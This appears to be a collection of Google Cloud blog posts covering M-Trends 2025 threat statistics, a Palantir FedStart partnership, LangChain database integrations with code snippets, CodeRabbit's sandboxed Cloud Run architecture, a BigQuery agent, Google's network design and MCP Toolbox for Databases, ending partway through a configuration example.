One of the ways threat actors keep up with the constantly evolving cyber defense landscape is by raising the level of sophistication of their attacks. This trend can be seen across many of our engagements, particularly when responding to China-nexus groups. These actors have demonstrated the ability to create custom malware ecosystems, identify and use zero-day vulnerabilities in security and other appliances, leverage proxy networks akin to botnets, target edge devices and platforms that traditionally lack endpoint detection and response, and employ custom obfuscators in their malware. They take these extra steps to evade detection, stifle analysis, and ultimately stay on systems for longer periods of time.
However, not all successful attacks are highly complex and technical. Attackers often take advantage of whatever opportunities are available to them, including using credentials stolen in infostealer operations to gain initial access. Mandiant has seen such a rise in infostealer use that stolen credentials are now the second most common initial infection vector, appearing in 16% of our investigations. Attackers also exploit gaps and risks introduced during cloud migrations, and target unsecured data repositories to obtain credentials and other sensitive information.
Today we released M-Trends 2025, the 16th edition of our annual report, to help organizations stay ahead of all types of attacks. We dive deep into several trends and share data and analysis from the frontlines of our incident response engagements to arm defenders with critical insights into the latest cyber threats.
M-Trends 2025 data is based on more than 450,000 hours of Mandiant Consulting investigations. The metrics are based on investigations of targeted attack activity conducted between Jan. 1, 2024 and Dec. 31, 2024. Key findings in M-Trends 2025 include:
55% of threat groups active in 2024 were financially motivated, which marks a steady increase, and 8% of threat groups were motivated by espionage.
Exploits continue to be the most common initial infection vector (33%), and for the first time stolen credentials rose to the second most common in 2024 (16%).
The top targeted industries include financial (17.4%), business and professional services (11.1%), high tech (10.6%), government (9.5%), and healthcare (9.3%).
Global median dwell time rose to 11 days from 10 days in 2023. Median dwell time was 26 days when an external entity notified the organization, 5 days when the adversary notified the organization (notably in ransomware cases), and 10 days when the organization discovered the malicious activity internally.
M-Trends 2025 dives deep into the aforementioned infostealer, cloud, and unsecured data repository trends, and several other topics, including:
Democratic People’s Republic of Korea deploying citizens as remote IT contractors, using false identities to generate revenue and fund national interests.
Iran-nexus threat actors ramping up cyber operations in 2024, notably targeting Israeli entities and using a variety of methods to improve intrusion success.
Attackers targeting cloud-based stores of centralized authority, such as single sign-on portals, to gain broad access.
Increased targeting of Web3 technologies such as cryptocurrencies and blockchains for theft, money laundering, and financing illicit activities.
Recommendations for Organizations
Each article in M-Trends 2025 offers critical recommendations for organizations to enhance their cybersecurity postures, with several of them being applicable to multiple trends. We advise that organizations:
Implement a layered security approach that emphasizes sound fundamentals such as vulnerability management, least privilege, and hardening.
Enforce FIDO2-compliant multi-factor authentication across all user accounts, especially privileged accounts.
Invest in advanced detection technologies and develop robust incident response plans.
Improve logging and monitoring practices to identify suspicious activity and reduce dwell time.
Consider threat hunting exercises to proactively search for indicators of compromise.
Implement strong security controls for cloud migrations and deployments.
Regularly assess and audit cloud environments for vulnerabilities and misconfigurations.
Mitigate insider risk by practicing thorough vetting processes for employees (especially remote workers), monitoring for suspicious activity, and enforcing strict access controls.
Keep up-to-date with the latest threat intelligence, adapt security strategies accordingly, and regularly review and update security policies and procedures to address evolving threats.
Be Ready to Respond
The M-Trends mission has always been to equip security professionals with frontline insights into the latest evolving cyberattacks and to provide practical and actionable learnings for better organizational security.
At Google Public Sector, we are committed to helping our customers execute their missions. Now, we’re expanding this commitment by adding support for Palantir’s FedStart platform, so public sector customers can use software and applications running on Google Cloud’s accredited infrastructure through Palantir FedStart.
Palantir FedStart helps U.S. government agencies achieve compliance, scale operations, and access innovative mission-critical solutions from leading independent software vendors (ISVs), including many built natively on Google Cloud. The combination of world-class solutions, Google’s global-scale infrastructure and security, and Palantir’s turnkey compliance will accelerate innovation across U.S. government agencies. This will provide government agencies with certified solutions across multiple cloud platforms, while upholding the highest security and compliance standards.
Our collaboration with Palantir also gives ISVs a faster path to accreditation and impact. At launch, the first ISV to use this new capability is Anthropic. Its Claude for Enterprise application will be available to federal government agencies through Palantir FedStart on Google Cloud.
By partnering with industry leaders to bring cutting-edge technologies to the U.S. government, Google can accelerate public sector mission impact and outcomes. Key benefits of this offering include:
Accelerated ISV onboarding: Palantir’s FedStart solution will streamline the FedRAMP High and IL5 accreditation process for ISVs built on Google Cloud.
Enhanced AI capabilities: In addition to Gemini on Google Cloud, government customers will gain access to Anthropic’s Claude for Enterprise and Palantir’s technologies that back the FedStart offering on Google Cloud – including Apollo, Rubix, Foundry, and AIP.
Secure and scalable infrastructure: Google Cloud’s secure and scalable infrastructure will ensure the reliable and responsible deployment of AI solutions for sensitive government use cases, without the inherent limitations of legacy GovClouds. To thrive in this AI-driven era, our public sector customers need a modern cloud partner offering unmatched scale, features, and security that GovClouds cannot deliver, which is why we are committed to certifying our entire U.S. cloud infrastructure at IL5.
We continue to invest in our accredited commercial cloud, ensuring the public sector gets what the private sector gets: the same features, services, and computing power that are critical for AI workloads. Today, we have 140 services accredited at FedRAMP High. We have an extensive data center footprint for FedRAMP High workloads, with nine U.S. regions to choose from. Building on this foundation, this offering with Palantir helps make cutting-edge technology solutions more accessible to the U.S. government, particularly for those operating with highly sensitive data, by providing a secure and authorized environment for leveraging advanced technology.
Google Public Sector has a proven track record of success in partnering with U.S. government agencies like the Navy, Air Force, and Defense Innovation Unit (DIU) to power mission-critical operations. Palantir FedStart and Anthropic’s Claude for Enterprise, available soon on Google Cloud, further underscore our commitment to the public sector. By combining Google Cloud’s secure and FedRAMP-compliant infrastructure with Palantir’s expertise in software solutions for government, U.S. government agencies will be able to use the latest advancements in AI and software technology to drive mission impact and outcomes.
Learn more about how Google’s AI solutions can empower your agency and see examples of how we are helping accelerate mission impact with AI here. To learn more about Palantir FedStart, contact FedStart@palantir.com or visit palantir.com/fedstart. Learn more about Anthropic and Claude at anthropic.com.
Today, we are expanding language support for our integrations to include Go, Java, and JavaScript.
Each package will have up to three LangChain integrations:
Vector stores to enable semantic search for our databases
Chat message history to enable chains to recall previous conversations
Document loader for loading documents from your enterprise data
Developers now have the flexibility to create intricate workflows and easily interchange underlying components (like a vector database) as needed to align with specific use cases. This technology unlocks a variety of applications, including personalized product recommendations, question answering, document search and synthesis, customer service automation, and more.
In this post, we’ll share more about the integrations – and code snippets to get started.
New language support
LangChain is known for its popular Python package; however, your team’s expertise and services may not be in Python. Java and Go are commonly used programming languages for production-grade and enterprise-scale applications. Developers may prefer JavaScript and TypeScript for their asynchronous programming support and compatibility with front-end frameworks like React and Vue.
In addition to Python developers, the LangChain developer community encompasses developers proficient in Java, JavaScript, and Go. It is an active and supportive community centered around the LangChain framework, which facilitates the development of applications powered by large language models (LLMs).
Google Cloud is dedicated to providing secure and easy-to-use database integrations for your gen AI applications. Our integrations embed Google Cloud connectors that create secure connections, handle SSL certificates, and support IAM authorization and authentication. The integrations are optimized for PostgreSQL databases (AlloyDB for PostgreSQL, AlloyDB Omni, Cloud SQL for PostgreSQL) to ensure proper connection management, flexible table schemas, and improved filtering.
JavaScript Support
JavaScript developers can utilize LangChain.js, which provides tools and building blocks for developing applications leveraging LLMs. LangChain simplifies the process of connecting LLMs to external data sources and enables reasoning capabilities in applications. Other Google Cloud integrations, such as Gemini models, are available within LangChain.js, allowing seamless interaction with GCP resources.
Use this package with AlloyDB for PostgreSQL and AlloyDB Omni by customizing your Engine to connect to your instance. You will need the AlloyDB Auth Proxy to make authorized, encrypted connections to AlloyDB instances.
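The snippets in this section assume an `engine` that manages connections to your database. As a rough, hypothetical sketch of what that setup might look like (the factory name and signature here are assumptions modeled on the package’s Python counterpart; check the `@langchain/google-cloud-sql-pg` documentation for the exact API):

```javascript
import { PostgresEngine } from "@langchain/google-cloud-sql-pg";

// Hypothetical setup sketch; verify names against the package docs.
// For AlloyDB, run the AlloyDB Auth Proxy locally and point the engine
// at its address to get authorized, encrypted connections.
const engine = await PostgresEngine.fromInstance(
  "my-project",   // placeholder project ID
  "us-central1",  // placeholder region
  "my-instance",  // placeholder instance name
  "my_database"   // placeholder database name
);
```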
Document loader

```javascript
import { PostgresLoader } from "@langchain/google-cloud-sql-pg";

// Load rows from the database as documents.
const loader = await PostgresLoader.create(engine, {
  query: "SELECT * FROM my_table",
});

const data = await loader.load();
```
Java Support
For Java developers, there’s LangChain4j, a Java implementation of LangChain. This allows Java developers to build LLM-powered applications with a familiar ecosystem. In LangChain4j, you can also access the full array of VertexAI Gemini models.
*Note: Cloud SQL integrations will be released soon.
Below are the integrations and their code snippets to get started.
For Maven in pom.xml:
```xml
<dependency>
  <groupId>dev.langchain4j</groupId>
  <artifactId>langchain4j-alloydb-pg</artifactId>
  <version>1.0.0-beta3</version>
</dependency>

<!-- New version to be released -->
<dependency>
  <groupId>dev.langchain4j</groupId>
  <artifactId>langchain4j-cloud-sql-pg</artifactId>
  <version>1.0.0-beta4</version>
</dependency>
```
Vector store

```java
import dev.langchain4j.store.embedding.alloydb.AlloyDBEmbeddingStore;

// Create the vector table once, then build the embedding store on top of it.
engine.initVectorStoreTable(EmbeddingStoreConfig.builder(tableName, vectorSize).build());
AlloyDBEmbeddingStore store = new AlloyDBEmbeddingStore.Builder(engine, tableName).build();
```
Document loader
```java
import dev.langchain4j.data.document.loader.alloydb.AlloyDBLoader;

// Load rows from the database as LangChain4j documents.
AlloyDBLoader loader = new AlloyDBLoader.Builder(engine).query("SELECT * FROM my_table").build();
List<Document> data = loader.load();
```
Go support
LangchainGo is the Go programming language port of LangChain.
The LangChain framework was designed to support the development of sophisticated applications that connect language models to data sources and enable interaction with their environment. The most powerful and differentiated applications go beyond simply using a language model via an API; they are data-aware and agentic.
Vector store

```go
package main

import (
	"context"
	"log"

	"github.com/tmc/langchaingo/embeddings"
	"github.com/tmc/langchaingo/internal/alloydbutil"
	"github.com/tmc/langchaingo/llms/googleai/vertex"
	"github.com/tmc/langchaingo/vectorstores/alloydb"
)

func main() {
	ctx := context.Background()

	// pgEngine, projectID, and vertexLocation are assumed to be initialized elsewhere.

	// Initialize the table for the vector store to use.
	// You only need to do this the first time you use this table.
	vectorstoreTableOptions := &alloydbutil.VectorstoreTableOptions{
		TableName:  "my_table",
		VectorSize: 768,
	}
	if err := pgEngine.InitVectorstoreTable(ctx, *vectorstoreTableOptions); err != nil {
		log.Fatal(err)
	}

	// Initialize the Vertex AI embedding model.
	llm, err := vertex.New(ctx,
		vertex.WithCloudProject(projectID),
		vertex.WithCloudLocation(vertexLocation),
		vertex.WithDefaultModel("text-embedding-005"),
	)
	if err != nil {
		log.Fatal(err)
	}

	e, err := embeddings.NewEmbedder(llm)
	if err != nil {
		log.Fatal(err)
	}

	// Create a new AlloyDB vector store.
	vs, err := alloydb.NewVectorStore(ctx, pgEngine, e, "my_table")
	if err != nil {
		log.Fatal(err)
	}
	_ = vs
}
```
Chat message history
```go
import (
	"context"
	"log"

	"github.com/tmc/langchaingo/internal/alloydbutil"
	"github.com/tmc/langchaingo/llms"
	"github.com/tmc/langchaingo/memory/alloydb"
)

// Create a new table in the Postgres database to store the chat history.
err = pgEngine.InitChatHistoryTable(ctx, tableName)
if err != nil {
	log.Fatal(err)
}

// Create a new chat message history backed by that table.
cmh, err := alloydb.NewChatMessageHistory(ctx, *pgEngine, tableName, sessionID)
if err != nil {
	log.Fatal(err)
}
```
*Note: Code is shown for AlloyDB. See the links for Cloud SQL for PostgreSQL examples.
Get started
The LangChain Vector stores integration is available for Google Cloud databases with vector support, including AlloyDB, Cloud SQL for PostgreSQL, Firestore, Memorystore for Redis, and Spanner.
The Document loaders and Memory integrations are available for all Google Cloud databases including AlloyDB, Cloud SQL for MySQL, PostgreSQL and SQL Server, Firestore, Datastore, Bigtable, Memorystore for Redis, El Carro for Oracle databases, and Spanner. Below are a few resources to get started.
CodeRabbit, a rapidly growing AI code review tool, is leveraging Google Cloud Run to cut code review time and bugs in half by safely and efficiently executing untrusted code.
CodeRabbit improves code quality and automates code reviews by analyzing changes against the entire codebase and generating scripts for deeper analysis. It integrates with code hosting platforms to provide automated feedback on pull requests.
To safely execute untrusted code, CodeRabbit needed an execution environment that was scalable, cost-effective, and secure enough to analyze and run their customers’ code.
In this post, we’ll share how CodeRabbit built an AI code review agent with Google Cloud Run to scale dynamically and handle high volumes efficiently and securely.
CodeRabbit in Action
CodeRabbit integrates directly with platforms like GitHub and GitLab, providing automated code reviews triggered by pull requests. Its foundation-model integration doesn’t just analyze the changed files; it assesses the impact of those changes on the entire codebase. This requires a sophisticated system that can:
Clone the user’s repository.
Set up a build environment with necessary dependencies (think npm install, go mod download, etc.).
Run static analysis tools including 20+ linters and security scanners.
Execute AI-generated scripts. This is where things get really interesting. CodeRabbit’s AI agent creates shell scripts to navigate the code, search for specific patterns (using tools like cat, grep, and even ast-grep), and extract relevant information. It can even generate Python code for analysis. (A sketch of such a script follows this list.)
Interact with external services. CodeRabbit can also perform actions by generating and executing curl commands, for example to interface with services like Slack, Jira, and Linear.
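To make the AI-generated scripts step concrete, here is an entirely hypothetical example of the kind of script the agent might produce using the tools named above (the file and function names are invented for illustration):

```bash
#!/usr/bin/env bash
# Hypothetical agent-generated analysis script.

# Find every structural call site of a renamed function.
ast-grep --pattern 'fetchUser($$$)' --lang ts src/

# Fall back to a plain-text search for dynamic or string references.
grep -rn "fetchUser" --include='*.ts' src/ | head -n 50

# Dump the implementation for context.
cat src/api/users.ts
```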
This solution needs to be scalable, cost-effective, and above all, secure. The code being analyzed and executed is, by definition, untrusted. It could be incomplete, buggy, or even contain malicious intent.
The solution: Cloud Run
CodeRabbit Architecture: Powered by Cloud Run
CodeRabbit’s architecture cleverly combines several technologies to create a robust and isolated execution environment:
Cloud Run services: CodeRabbit uses Cloud Run services as the foundation. Incoming webhook events (from GitHub, GitLab, etc.) are first handled by a lightweight Cloud Run service that performs billing and subscription checks. This service then pushes a task to Google Cloud Tasks.
Google Cloud Tasks: This acts as a queue, decoupling webhook handling from the actual code execution. This allows CodeRabbit to handle bursts of pull requests without overwhelming the system.
Cloud Run execution service: This is the heart of the system. A separate Cloud Run service pulls tasks from the Cloud Tasks queue, with each task representing a code review request. The service is configured with a 3,600-second request timeout and a concurrency of 8 requests per instance, allowing it to scale based on CPU utilization. This setup is crucial because code reviews are long-running operations, often taking 10-20 minutes to complete. The execution service uses an in-memory volume mount where the entire repository, build artifacts, and temporary files are stored.
Sandboxing: All Cloud Run instances are protected by two layers of sandboxing and can be configured with minimal IAM permissions via a dedicated service identity. In addition, CodeRabbit leverages Cloud Run’s second-generation execution environment, a microVM providing full Linux cgroup functionality. Within each Cloud Run instance, CodeRabbit uses Jailkit to create isolated processes and cgroups to further restrict the privileges of the jailed process.
Sandboxing is especially critical for CodeRabbit in scenarios where untrusted code must be executed, such as:
Static analyzers that support custom, untrusted plugins (e.g., ESLint, Rubocop)
LLM-generated verification scripts for deeper analysis of the entire codebase
LLM-generated CLI actions, such as opening GitHub or Jira issues
Python-based advanced analyses
Code verification: publishing a running analysis chain that ran in a Cloud Run sandbox
CodeRabbit’s use of Cloud Run allows it to scale dynamically. During peak hours, CodeRabbit’s agentic PR reviewer service receives up to 10 requests per second, served by over 200 Cloud Run instances. Each Cloud Run instance is fairly bulky, using 8 vCPUs and 32 GiB of memory. CodeRabbit sees high CPU utilization, significant network traffic (downloading repositories and dependencies), and high memory usage when powering its PR reviewer service with Cloud Run; a deployment sketch with these settings follows below.
Cloud Run instances powering CodeRabbit
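For reference, a service with a similar shape could be deployed roughly like this (the service name, image, and volume size are placeholders, not CodeRabbit’s actual configuration):

```bash
gcloud run deploy pr-review-executor \
  --image=us-docker.pkg.dev/my-project/agents/executor:latest \
  --execution-environment=gen2 \
  --timeout=3600 \
  --concurrency=8 \
  --cpu=8 \
  --memory=32Gi \
  --add-volume=name=workspace,type=in-memory,size-limit=16Gi \
  --add-volume-mount=volume=workspace,mount-path=/workspace \
  --service-account=executor-sa@my-project.iam.gserviceaccount.com
```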
Try this on your own
CodeRabbit’s use of Google Cloud Run is a compelling example of how to build a secure, scalable, and cost-effective platform for running AI-powered code analysis. Their architecture provides a blueprint for developers tackling similar challenges, and their experience highlights the evolving capabilities of serverless technologies. We’re excited to see how their platform advances as Cloud Run continues to add new features.
For years, data teams have relied on the BigQuery platform to power their analytics and unlock critical business insights. But building, managing, and troubleshooting the data pipelines that feed those insights can be a complex, time-consuming process, requiring specialized expertise and a lot of manual effort. Today, we’re excited to announce our vision for a major step forward in simplifying and accelerating data engineering: the BigQuery data engineering agent.
These agents aren’t just assistive tools, but agentic solutions, designed to act as intelligent partners in your data workflows. They automate daunting tasks, collaborate with your team, and continuously learn and adapt, freeing you to focus on what matters most: extracting value from your data.
Why a data engineering agent?
The world of data is changing. Organizations are generating more data than ever before, and that data is coming from a wider variety of sources, in a multitude of formats. At the same time, businesses need to move faster, making quick, data-driven decisions to stay competitive.
This creates a challenge. Traditional data engineering approaches often involve:
Tedious manual coding: Building and modifying pipelines can require writing and updating complex SQL queries, which is time-consuming and error-prone.
Schema struggles: Mapping data from different sources to the right format can be time-intensive, especially as schemas evolve.
Difficult troubleshooting: Diagnosing and fixing pipeline issues can involve lengthy sifting through logs and code, delaying critical insights.
Siloed expertise: Building and maintaining pipelines often requires specialized skills, creating bottlenecks and limiting who can contribute.
The BigQuery data engineering agent aims to address these pain points head-on and accelerate the way data pipelines are built and managed.
Meet your new AI-powered data engineering team
Imagine a team of expert data engineers, available 24/7, ready to jump in and tackle toilsome pipeline development, maintenance, and troubleshooting tasks, enabling your data team to scale and focus on higher-value work. We are announcing the data engineering agent as an experimental release.
Here are a few ways the BigQuery data engineering agent will change the game:
1. Autonomous pipeline building and modification
Do you need a new pipeline to ingest, transform, and validate data? Simply describe your needs in natural language – the agent handles the rest. For example:
“Create a pipeline to load data from the ‘customer_orders’ bucket, standardize the date formats, remove duplicate entries based on order ID, and load it into a BigQuery table named ‘clean_orders’.”
The agent, leveraging its understanding of data engineering best practices and your specific environment and context, generates the necessary SQL code, builds the pipeline, and even creates basic unit tests. It’s not just about automation; it’s about intelligent, context-aware automation.
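For illustration only, a generated transformation step for the request above might look something like the following (the table and column names are hypothetical; the agent derives the real ones from your environment):

```sql
-- Hypothetical example of agent-generated BigQuery SQL.
CREATE OR REPLACE TABLE my_dataset.clean_orders AS
SELECT * EXCEPT(row_num)
FROM (
  SELECT
    *,
    -- Standardize the date format.
    PARSE_DATE('%m/%d/%Y', order_date_raw) AS order_date,
    -- Keep only the most recent row per order ID.
    ROW_NUMBER() OVER (PARTITION BY order_id ORDER BY load_time DESC) AS row_num
  FROM my_dataset.raw_customer_orders
)
WHERE row_num = 1;
```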
Need to update an existing pipeline? Just tell the agent what you want to change. It analyzes the existing code, proposes modifications, and even highlights potential impacts on downstream processes. You remain in control, reviewing and approving changes, but the agent handles the heavy lifting.
2. Proactive troubleshooting and optimization
Pipeline issues? The agent monitors your pipelines, identifies issues such as schema and data drift, and proposes fixes. It’s like having a dedicated expert constantly watching over your data infrastructure.
3. Bulk draft pipelines
A powerful use of the data engineering agent is to scale pipeline generation or modification using previously acquired context and knowledge. This allows users to quickly scale pipelines for different departments or use cases, with customizations as needed, using the command line and API for automation at scale. In the example below, the agent takes instructions from the command line and leverages domain-specific agent instructions to create bulk pipelines.
How it works: Intelligence under the hood
To handle the complexity that most organizations have to deal with, the agents rely on several key concepts:
Hierarchical context: The agents draw on multiple sources of knowledge:
Universal understanding of common data formats, SQL best practices, etc.
Vertical-specific knowledge of industry conventions (e.g., data formats in healthcare or finance)
Organizational awareness of your company’s or department’s specific business context, data structures, naming conventions, and security policies
Data pipeline-specific understanding of source and target schemas, transformations, and dependencies
Continuous learning: The agents don’t just follow instructions; they learn from user interactions and previously developed pipelines. Agent knowledge gets continually enhanced over time as they work in your environment.
A collaborative, multi-agent environment
The BigQuery data engineering agent is part of a multi-agent environment in which specialized agents collaborate to achieve complex goals, working together and delegating tasks, much like a real-world data engineering team:
An ingestion agent expertly handles data intake from various sources.
A transformation agent crafts efficient and reliable data pipelines.
A validation agent helps ensure data quality and consistency.
A troubleshooting agent proactively identifies and resolves issues.
A data quality agent, powered by Dataplex metadata, monitors data and proactively alerts on anomalies.
Our initial focus is on ingestion, transformation and troubleshooting tasks, but we plan to expand these initial capabilities to other critical data engineering tasks.
Your workflow, your way
Whether you prefer working in the BigQuery Studio UI, crafting code in your favorite IDE, or managing pipelines through the command line, we want to meet you where you are. We are initially making the data engineering agent available in BigQuery Studio’s pipeline editor and via the API/CLI, but we plan to expose it in other contexts.
Data engineering agent and your data workers
The world is only beginning to see the full potential of AI-powered agents in revolutionizing how data workers interact with and derive value from their data. With the BigQuery data engineering agent, the roles of data engineers, data analysts, and data scientists are expanding beyond their traditional boundaries, empowering these teams to achieve more, faster, and with greater confidence. These agents act as intelligent collaborators, streamlining workflows, automating tedious tasks, and unlocking new levels of productivity. Initially, we are focusing on the core data engineering task of promoting data from Bronze to Silver in a data lake, and expanding from there.
Coupled with products like Dataplex, BigQuery ML, and Vertex AI, BigQuery data engineering agent is poised to transform the way organizations manage, process, and derive value from their data. By automating complex tasks, promoting collaboration, and empowering data workers of all skill levels, these agents are paving the way for a new era of data-driven innovation.
Ready to get started?
This is just the beginning of our journey to build a truly intelligent, autonomous data platform. We’re committed to continuously expanding the capabilities of the data engineering agent, making it an even more powerful and intuitive partner for all your data needs.
The BigQuery data engineering agent will be available soon. We’re excited to see how it fits into your data engineering workflows and helps you unlock the full potential of your data. Show your interest in getting access here.
The unprecedented growth and unique challenges of AI applications are driving fundamental architectural changes to Google’s next-generation global network.
The AI era brings an explosive surge in demand for network capacity, with novel traffic patterns characteristic of large-scale model training and inference. Simultaneously, the critical need for unwavering reliability has reached new heights; in an AI-driven world, outages are simply not an option. Furthermore, the requirement for enhanced security and fine-grained control, including data sovereignty considerations, is paramount. Finally, the operational cost and complexity associated with scaling traditional network architectures necessitate a more innovative approach, pushing us beyond basic automation towards true autonomy.
As we discussed in this blog, we are meeting these challenges head-on by building the next generation of Google’s global network upon four key architectural principles: (1) exponential scalability, (2) beyond-9s reliability, (3) intent-driven programmability, and (4) autonomous networking.
In this blog, let’s peel back the layers and see how the underlying technology makes these four principles a reality.
Exponential scalability with a multi-shard network
We embrace elastic horizontal scaling as a core architectural principle for Google’s global network through our multi-shard network. Instead of one monolithic network, we’ve built multiple independent shards. This provides several benefits:
Horizontal scaling: When more capacity is needed, we can scale up by growing a shard, and scale out by adding more shards, overcoming the limits and complexity of vertical scale. This is akin to adding more independent networks, rather than trying to make a single network bigger and bigger.
Independent planes: The separation of control, data, and management planes within each shard significantly limits the impact radius of any potential issue. A software bug or operational error (such as an incorrect configuration push) in one shard is far less likely to impact others, enhancing the network’s overall stability.
In the AI era, the WAN is the new LAN and the continent is the data center. This horizontal scaling approach, inspired by the design of our massive data center fabrics, allows Google’s global network to handle the unprecedented bandwidth demands of today’s AI workloads. This multi-shard network has been a key enabler for us to accommodate the average 7X WAN traffic growth between 2020 and 2025, and more importantly, an order of magnitude growth in peak traffic due to the bursty nature of ML traffic over the same period.
Beyond-9s reliability: Architecting for resilience
In a world of always-on services, reliability is paramount. Google’s global network incorporates several key innovations to achieve beyond-9s availability, emphasizing diversity and independence at every layer of the stack to avoid “shared fate” (cascading failures) and minimize impact during failures.
Multi-shard isolation: Each network shard has independent data, control, and management planes. We control what can enter and leave these shards to a cluster or edge. This prevents a bad state from a cluster poisoning all the shards at the same time. The sharded architecture inherently provides a degree of isolation. Furthermore, we apply a multi-vendor paradigm when deploying our network shards, thanks to years of development of open API and models (discussed later) that allows us to operationalize any vendor platform under the same network function. This multi-vendor approach protects our network shards from vulnerabilities introduced by third-party software or hardware.
Region isolation: With this approach, regional cores keep traffic within their domains, and regional gateways enforce policies for traffic that’s entering or leaving. This limits the impact of regional events, effectively shielding the rest of the network.
Protective ReRoute: Google’s global network implements a unique transport technique for shortening user-visible outages that complements routing repair, and it marks a radical shift in how we think about network reliability. In the conventional network model, hosts send packets, and routers handle them. With Protective ReRoute, hosts actively shift traffic flows across network paths to improve reliability and performance, intelligently detecting network path anomalies and promptly, automatically rerouting traffic to a healthy, alternative path, which can be in the same or alternative shard. The host reroutes traffic in round-trip time scales, i.e., O(RTT), by changing a few bits in the packet header that are used to compute the hash function to select a specific path among many equally viable paths. This host-initiated re-routing protects customer traffic beyond what traditional routing and traffic engineering can achieve, and is independent of the type of network, scale of network, or type of failure, thereby providing robust and deterministic recovery and performance. With Protective ReRoute in our network, we have observed up to a 93% reduction in cumulative outage minutes.
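Conceptually, the mechanism looks like the sketch below: multipath selection hashes a handful of header fields, so flipping bits in one hashed field deterministically lands the flow on a different path. This is an illustration of the idea, not Google’s implementation:

```python
# Conceptual illustration only, not Google's implementation.
def fnv1a(values: list[int]) -> int:
    """32-bit FNV-1a hash over a list of header-field values."""
    h = 0x811C9DC5
    for v in values:
        h = ((h ^ (v & 0xFFFFFFFF)) * 0x01000193) & 0xFFFFFFFF
    return h

def select_path(src_port: int, dst_port: int, flow_label: int, num_paths: int) -> int:
    """ECMP-style selection among equally viable paths."""
    return fnv1a([src_port, dst_port, flow_label]) % num_paths

# A host that detects a black-holed path re-rolls the hashed bits
# (a flow-label-like header field) and lands on a different path within
# round-trip-time scales, without waiting for routing to converge.
flow_label = 0x12345
old_path = select_path(51234, 443, flow_label, 16)
flow_label = (flow_label + 1) & 0xFFFFF  # 20-bit field
new_path = select_path(51234, 443, flow_label, 16)  # very likely different
print(old_path, new_path)
```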
For a conceptual overview of these scalability and resilience innovations, check out this video:
Also, be sure to check out this demo to see the combined value of our multi-shard network and Protective ReRoute in action. Here, we emulate a network shard failure and show how the host promptly detects a path failure and routes the traffic over an alternative path in a different, healthy shard, providing near-instant recovery.
Intent-driven programmability for fine-grained network controls
To cater to our customers’ diverse and evolving needs, network agility and fine-grained programmability is crucial. Google’s global network allows for network controls to be precisely tailored to specific business requirements, encompassing regulatory compliance, digital sovereignty mandates, and unique application performance needs, down to the most granular network attributes. This programmability is made possible by:
Software-defined networking (SDN) controllers: Google’s global network is fully intent-driven, with SDN everywhere. We use SDN controllers to manage network behavior hierarchically. Orion, our hierarchical and federated SDN control plane platform, propagates top-level intent through layers of network control applications, which then react by updating their internal state and generating intermediate intent for each network switch. This hierarchical propagation results in changes to the programmed flow state in network switches.
Universal network model: Our universal network model, Multi-Abstraction-Layer Topology representation, or MALT, allows us to specify generic intent and business policy. Our control and management planes can then use these representations to implement these policies coherently across the network.
Standardized API: Because we rely on the OpenConfig software layer, we can use multiple routing vendors interchangeably, making the network more robust. With vendor diversity, a bug or an issue in one vendor’s software or hardware doesn’t impact the whole network, and we have options when scaling our network.
This programmability enables us to implement business policies directly into the network fabric, offering granularity and the ability to isolate bandwidth for critical applications. Customers with specific regulatory requirements can also leverage this programmability to enforce their desired network path controls for their data in motion.
Autonomous networking for the network powering AI
The sheer scale and complexity of a global network like ours demands a shift from traditional automation to a more intelligent, autonomous approach that requires minimal human intervention. This is especially critical to avoid the substantial increase in operational expenses that comes with network growth, and to flatten the cost curves for network planning, design, and operations. Below are some examples where we apply AI/ML techniques today; we see opportunities to expand into many more use cases:
Network incident response with a Gemini and Vertex AI agentic framework: We are using an agentic AI approach to shorten outage times by identifying and mitigating failures faster, and to perform more effective root-cause analysis. This is helping us reduce the mean-time to detect and mean-time to resolve network issues.
Demand forecasting and capacity planning: We are using AutoML for accurate demand forecasting, and employing graph optimization to optimize our network capacity planning.
Reinforcement learning for routing optimization: We tune routing metrics for specific objectives, such as network performance, with reinforcement learning.
Autonomous networking has allowed us to slash failure mitigation times from hours to minutes, improving our network’s resilience and customer experience. Check out this demo to see an example of our autonomous network in action!
Google’s next-generation global network represents a paradigm shift in network architecture designed to power the AI era, embracing horizontal scalability through multi-sharding, architecting for resilience at every layer with regional isolation and Protective ReRoute, enabling fine-grained programmability with SDN, and adopting autonomous network operation powered by AI/ML. This helps Google’s global network provide the scale, reliability, performance, and security that today’s mission-critical services and AI/ML applications demand. This transformation of Google’s software-defined global backbone not only meets the formidable challenges of the AI era, but empowers our customers to innovate and thrive in this new landscape. Our next-generation network is designed to be the invisible, yet indispensable, force driving the future of technology and connectivity.
This deep dive only scratches the surface, but hopefully, provides a glimpse into the innovative technologies that underpin Google’s global network. As we continue to navigate the exciting challenges and opportunities of the AI era, Google’s global network is the bedrock upon which we build and deliver transformative experiences for users and customers worldwide. Stay tuned for more updates as Google’s global network continues to evolve!
At Google Cloud Next 25, we announced incredible ways for enterprises to build multi-agent ecosystems with Vertex AI and Google Cloud Databases – including better ways for agents to communicate with each other using Agent2Agent Protocol and Model Context Protocol (MCP). With the growing excitement around MCP for developers, we’re making it easy for MCP Toolbox for Databases (formerly Gen AI Toolbox for Databases) to access your enterprise data in databases. This is another step forward in providing secure and standardized ways to innovate with agentic applications. Let’s take a look.
MCP Toolbox for Databases (formerly Gen AI Toolbox for Databases)
MCP Toolbox for Databases (Toolbox) is an open-source MCP (Model Context Protocol) server that allows developers to connect gen AI agents to enterprise data easily and securely. MCP is an emerging open standard created by Anthropic for connecting AI systems with data sources through a standardized protocol, replacing fragmented, custom integrations.
Currently, Toolbox can be used to build tools for a large number of databases: AlloyDB for PostgreSQL (including AlloyDB Omni), Spanner, Cloud SQL for PostgreSQL, Cloud SQL for MySQL, Cloud SQL for SQL Server, and self-managed MySQL and PostgreSQL. Because it’s fully open-source, it includes contributions from third-party databases such as Neo4j and Dgraph. Toolbox offers simplified development with reduced boilerplate code, enhanced security through OAuth2 and OIDC, and end-to-end observability with OpenTelemetry integration. This enables you to develop tools easier, faster, and more securely by handling the complexities such as connection pooling, authentication, and more.
As an MCP server, Toolbox provides the additional scaffolding for implementing production-quality database tools and making them accessible to any client in the growing MCP ecosystem. This compatibility allows developers building agentic applications to leverage Toolbox and securely query a wide range of databases through a single, standardized protocol, simplifying development and enhancing interoperability.
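For example, Toolbox is configured with a tools.yaml file that defines data sources and the tools exposed to clients. The sketch below is illustrative (names, credentials, and schema details are placeholders; see the Toolbox documentation for the full configuration reference):

```yaml
# Illustrative tools.yaml sketch; values are placeholders.
sources:
  my-pg-source:
    kind: cloud-sql-postgres
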